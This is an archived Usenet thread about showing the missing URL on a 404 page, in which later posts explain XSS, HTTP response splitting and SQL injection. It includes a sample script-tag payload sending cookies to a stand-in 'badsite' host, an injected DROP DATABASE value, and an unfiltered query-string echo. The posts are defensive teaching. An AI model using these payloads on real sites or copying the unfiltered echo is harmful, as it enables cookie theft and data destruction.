How to retreive the URL of the chosen (but non-exsisting) page after redirect?

[M@r(o]

Hello all,

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

TIA,
Marco

 

[rf]

Hello all,

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

Ah, my idea is that is up to you to ensure your site has no broken
links/missing pages, not your visitors.

 

[Pavel Lepin]

We've got the following problem: When a visitor klicks a
dead link he ends up on a 404-page like should be. On that
page there's an opportunity to mail the webmaster (me)
about the missing page. Most visitors don't describe the
link or the page they came from (containing the dead link)
so I really would like to prefill their email with the URL
of the page that seems to be missing. All ideas are
welcome...

Perhaps I'm missing something, but I'm wondering why would
you want to do that? Wouldn't it be more correct to grep
your access logs for 404's and check Referers to see what's
causing the problem? Asking your clients to act as QA,
especially where there doesn't seem to be any need to do
that, seems a bit unprofessional to me.

In any case, an online bug report form would seem like a
better solution than asking your customers to disclose
their e-mail addresses.

 

[shimmyshack]

Hello all,

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

TIA,
Marco

yeah you can use apache (if you use it) to prefill the details, or can
use php, or even javascript, but it all depends on whether the user
agent has sent the referer.

of course you could write an external javascript included on each page
of your site - since were on a js group - that parses the page for
urls, and does a HEAD using ajax, sending the results back to a page
on your site (which does exist) so you can get a database full of all
the things you need to fix!

Can you not use HTTrack (versions for linux or windows) or wget to
spider your site and find the naughty pages, assuming you dont use
javascript for all the links, (postback, spit \. )

 

[Evertjan.]

M@r(o wrote on 02 nov 2007 in comp.lang.javascript:

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

Using serverside J[ava]script on a ASP platform:

Error page: <% = request.serverVariables("QUERY_STRING") %>

 

[shimmyshack]

M@r(o wrote on 02 nov 2007 in comp.lang.javascript:

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

Using serverside J[ava]script on a ASP platform:

Error page: <% = request.serverVariables("QUERY_STRING") %>

If you se this:
Error page: <% = request.serverVariables("QUERY_STRING") %>
make sure to filter it first to avoid XSS, and response splitting etc..

 

[Evertjan.]

shimmyshack wrote on 15 nov 2007 in comp.lang.javascript:

M@r(o wrote on 02 nov 2007 in comp.lang.javascript:

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...

Using serverside J[ava]script on a ASP platform:

Error page: <% = request.serverVariables("QUERY_STRING") %>

[please do not quote signatures on usenet]

If you se this:
Error page: <% = request.serverVariables("QUERY_STRING") %>
make sure to filter it first to avoid XSS, and response splitting etc..

I don't se, could you explain?

What is XSS?

Why avoid response splitting?

 

[shimmyshack]

We've got the following problem: When a visitor klicks a dead link he
ends up on a 404-page like should be. On that page there's an
opportunity to mail the webmaster (me) about the missing page. Most
visitors don't describe the link or the page they came from
(containing the dead link) so I really would like to prefill their
email with the URL of the page that seems to be missing.
All ideas are welcome...
Using serverside J[ava]script on a ASP platform:
Error page: <% = request.serverVariables("QUERY_STRING") %>

[please do not quote signatures on usenet]

If you se this:
Error page: <% = request.serverVariables("QUERY_STRING") %>
make sure to filter it first to avoid XSS, and response splitting etc..

I don't se, could you explain?

What is XSS?

Why avoid response splitting?

well if you just print the query string to the html page then a
cunning attacker can form a query string which will print a string to
the page which might steal the cookies of that site (if the user is
logged in) or perform some other attacks.
XSS is cross site scripting, where if you alow the content of your
webpage to be printed to screen as html the attacker can control your
user base. In your example you would validate that the query string
was in the form you expected, before printing it.


Response splitting is where the value of the Location header (which is
send by the server when it wants to redirect the user agent to an
error page - or just to another page) allows code to be injected into
it. Some servers are vulnerable to reponse splitting. Where say a UTF7
encoded strong is sent as the URL to be reidrected to, this UTF string
might have a newline sequence in it which /splits/ the location
header, and allows the injection of completely new headers, which
force the server to return 2 resources instead of just one. This
allows the attacker to get control over the user. It's unlikely
especially if you patch and upgrade your architecture, because this
kind of attack is relatively old as webapp attacks go. But it too
comes from improper validation and filtering before including a URL
string in the location header of a dynamic redirect.

So basically, if you take a value (that could have been supplied by a
user) it must be checked over before being used. Hope thats a bit
clearer.

 

[Evertjan.]

shimmyshack wrote on 18 nov 2007 in comp.lang.javascript:

well if you just print the query string to the html page

Why woul you do that?

then a
cunning attacker can form a query string which will print a string to
the page which might steal the cookies of that site (if the user is
logged in) or perform some other attacks.

No, cookies live on the client. So the client is free to see them.

XSS is cross site scripting, where if you alow the content of your
webpage to be printed to screen as html the attacker can control your
user base.

So XSS is simply badly thought and written code?

Why do "cross site scripting" at all without adaequate defensive
measures?

In your example you would validate that the query string
was in the form you expected, before printing it.

My example?????????

Sorry, I see no reason to print a querystring, but for debugging.

Are we talking the same language?

Response splitting is where the value of the Location header (which is
send by the server when it wants to redirect the user agent to an
error page - or just to another page)

Who wants to redirect something, the server?

By user agent you mean the browser?

Why not send the requested page in the first place, dear server?

allows code to be injected into it.

What code injected into wat?

Some servers are vulnerable to reponse splitting.

Which servers? and which are not?

Where say a UTF7 encoded strong is sent as the URL to be reidrected to,
???

this UTF string
might have a newline sequence in it which /splits/ the location
header, and allows the injection of completely new headers, which
force the server to return 2 resources instead of just one. This
allows the attacker to get control over the user. It's unlikely
especially if you patch and upgrade your architecture, because this
kind of attack is relatively old as webapp attacks go. But it too
comes from improper validation and filtering before including a URL
string in the location header of a dynamic redirect.

So basically, if you take a value (that could have been supplied by a
user) it must be checked over before being used. Hope thats a bit
clearer.

Ah, now we are talking about a "value"?
I suppose you mean a string!

And you want to insert that string into an sql string?

Why didn't you say so in the first place?

We have no problems with that: either use Bob's methods or do a
intelligent input validation on all incoming strings.

These precautions are not limited to your cross-site scripting.

And has nothing to do specifically with redirecting.

 

[Bart Van der Donck]

http://en.wikipedia.org/wiki/Cross_site_scripting

shimmyshack wrote on 18 nov 2007 in comp.lang.javascript:

No, cookies live on the client. So the client is free to see them.

Taking this example, suppose you would print in a script '404.asp':

<% = request.serverVariables("QUERY_STRING") %>

And if you would follow a link like this (URL-decoded for readability,
one line):

404.asp?<script>window.location.href='http://www.badsite.
com/steal.php'+document.cookie</script>

Then http://www.badsite.com/steal.php knows your cookie of the other
domain.

So XSS is simply badly thought and written code?

Basically, yes; but it's not that simple. A coder may be unaware of
the consequences of what he's doing. Or the web server might not
correctly parse the offered data. Or the application. Or the libs that
he's using. Typically, beginning coders are easily trapped in opening
XSS security holes.

Why do "cross site scripting" at all without adaequate defensive
measures?


My example?????????

Well, the original poster asked for a way to know on which page the
surfer is when he encounters a 404-error. And you replied with an ASP
solution:

Error page: <% = request.serverVariables("QUERY_STRING") %>

Of course this would work fine; but shimmyshack's objection is well-
grounded, I'm afraid.

Who wants to redirect something, the server?

The attacker would want to force the server for a reload. But I don't
think shimmyshack is right in regard to the Location-header in this
particular example. You have passed the point of the headers here; you
are in the body of the server response already. Even if a malformed
%0D/%0A/%0D%0A would be decoded as newline, that could not cause any
problems in this case.

By user agent you mean the browser?
Yes.

Why not send the requested page in the first place, dear server?


What code injected into wat?

In the querystring (but it might as well be in the body of a POST-
request).

Which servers? and which are not?
http://en.wikipedia.org/wiki/HTTP_response_splitting


Ah, now we are talking about a "value"?
I suppose you mean a string!

And you want to insert that string into an sql string?

Sure. For instance, say that http://www.site.com/find.asp?id=4
gives you a web page with the details of article id 4, using
SELECT * FROM article WHERE id='4'

If an attacker does http://www.site.com/find.asp?id=4'; DROP DATABASE
db
then you'll have a problem since the following query is then executed:
SELECT * FROM article WHERE id='4'; DROP DATABASE db

This is probably the most simple form, there are many more
possibilities:
http://en.wikipedia.org/wiki/SQL_injection

Why didn't you say so in the first place?

We have no problems with that: either use Bob's methods or do a
intelligent input validation on all incoming strings.

I'm afraid this is an oversimplification. In a simple scenario,
validation can be impermeable with little effort indeed (like e.g.
expecting a number, alphanumeric string, valid email address...). But
an URL is already a bit harder. You can send a syntactically valid URL
which isn't safe. It all depends how web server and/or application
decode the querystring and what is the final result of it. And if
you're encoding your URL in UTF-8, it will be even more hard.

 

[shimmyshack]

The attacker would want to force the server for a reload. But I don't
think shimmyshack is right in regard to the Location-header in this
particular example. You have passed the point of the headers here; you
are in the body of the server response already. Even if a malformed
%0D/%0A/%0D%0A would be decoded as newline, that could not cause any
problems in this case.

of course you are right here! but i included it anyway just in case
someone reading the thread thought their /different/ method of a
redirect using some script which inserted the previous (possibly user
supplied) url as a string into a location header to a 404 reported
script was somehow safer.